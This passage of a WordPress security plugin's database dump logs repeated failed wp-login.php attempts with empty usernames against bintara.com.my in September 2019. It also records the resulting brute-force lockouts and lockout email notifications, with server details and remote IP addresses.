11:38:14',18089984,19290280,'https://bintara.com.my/wp/wp-login.php',1,0,'81.0.120.26'),(25682,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYLv7fBTP0kPOVnb8jqmwAAAE8\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"178.170.164.138\";s:11:\"REMOTE_PORT\";s:5:\"60023\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYLv7fBTP0kPOVnb8jqmwAAAE8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065919.9196\";s:12:\"REQUEST_TIME\";s:10:\"1569065919\";}}','notice','2019-09-21 11:38:41','2019-09-21 11:38:40',17797576,19287384,'https://bintara.com.my/wordpress/wp-login.php',1,0,'178.170.164.138'),(25683,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:38:40\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:38:40\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:53:40\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:53:40\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:38:41','2019-09-21 11:38:40',17882144,19287384,'https://bintara.com.my/wordpress/wp-login.php',1,0,'178.170.164.138'),(25684,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:38:41','2019-09-21 11:38:40',18087936,19287384,'https://bintara.com.my/wordpress/wp-login.php',1,0,'178.170.164.138'),(25685,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYL5XkXpgmG5P@iB8kaRgAAAIA\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"43.239.148.94\";s:11:\"REMOTE_PORT\";s:5:\"45036\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYL5XkXpgmG5P@iB8kaRgAAAIA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065958.1482\";s:12:\"REQUEST_TIME\";s:10:\"1569065958\";}}','notice','2019-09-21 11:39:19','2019-09-21 11:39:18',17799272,19290104,'https://bintara.com.my/blog/wp-login.php',1,0,'43.239.148.94'),(25686,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:39:18\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:39:18\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:54:18\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:54:18\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:39:19','2019-09-21 11:39:18',17884264,19290104,'https://bintara.com.my/blog/wp-login.php',1,0,'43.239.148.94'),(25687,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:39:19','2019-09-21 11:39:18',18090584,19290104,'https://bintara.com.my/blog/wp-login.php',1,0,'43.239.148.94'),(25688,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYL6HkXpgmG5P@iB8kaSgAAAIg\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"167.114.118.135\";s:11:\"REMOTE_PORT\";s:5:\"51624\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYL6HkXpgmG5P@iB8kaSgAAAIg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569065960.6248\";s:12:\"REQUEST_TIME\";s:10:\"1569065960\";}}','notice','2019-09-21 11:39:22','2019-09-21 11:39:21',17799088,19288560,'https://bintara.com.my/test/wp-login.php',1,0,'167.114.118.135'),(25689,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:39:21\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:39:21\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:54:21\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:54:21\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:39:22','2019-09-21 11:39:21',17883856,19288560,'https://bintara.com.my/test/wp-login.php',1,0,'167.114.118.135'),(25690,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:39:22','2019-09-21 11:39:21',18089440,19288560,'https://bintara.com.my/test/wp-login.php',1,0,'167.114.118.135'),(25691,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYMFnkXpgmG5P@iB8kakQAAAJU\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"173.236.72.146\";s:11:\"REMOTE_PORT\";s:5:\"42323\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYMFnkXpgmG5P@iB8kakQAAAJU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066006.6026\";s:12:\"REQUEST_TIME\";s:10:\"1569066006\";}}','notice','2019-09-21 11:40:08','2019-09-21 11:40:07',17797904,19288920,'https://bintara.com.my/wordpress/wp-login.php',1,0,'173.236.72.146'),(25692,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:40:07\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:40:07\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:55:07\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:55:07\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:40:08','2019-09-21 11:40:07',17882920,19288920,'https://bintara.com.my/wordpress/wp-login.php',1,0,'173.236.72.146'),(25693,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:40:08','2019-09-21 11:40:07',18088632,19288920,'https://bintara.com.my/wordpress/wp-login.php',1,0,'173.236.72.146'),(25694,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYMGXkXpgmG5P@iB8kalQAAAIk\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"151.236.35.139\";s:11:\"REMOTE_PORT\";s:5:\"53542\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYMGXkXpgmG5P@iB8kalQAAAIk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066010.0334\";s:12:\"REQUEST_TIME\";s:10:\"1569066010\";}}','notice','2019-09-21 11:40:11','2019-09-21 11:40:10',17799128,19290208,'https://bintara.com.my/2019/wp-login.php',1,0,'151.236.35.139'),(25695,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:40:10\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:40:10\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:55:10\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:55:10\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:40:11','2019-09-21 11:40:10',17884136,19290208,'https://bintara.com.my/2019/wp-login.php',1,0,'151.236.35.139'),(25696,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:40:12','2019-09-21 11:40:10',18090488,19290208,'https://bintara.com.my/2019/wp-login.php',1,0,'151.236.35.139'),(25697,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYMI3kXpgmG5P@iB8kaowAAAIU\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"192.99.200.69\";s:11:\"REMOTE_PORT\";s:5:\"49944\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYMI3kXpgmG5P@iB8kaowAAAIU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066019.7398\";s:12:\"REQUEST_TIME\";s:10:\"1569066019\";}}','notice','2019-09-21 11:40:21','2019-09-21 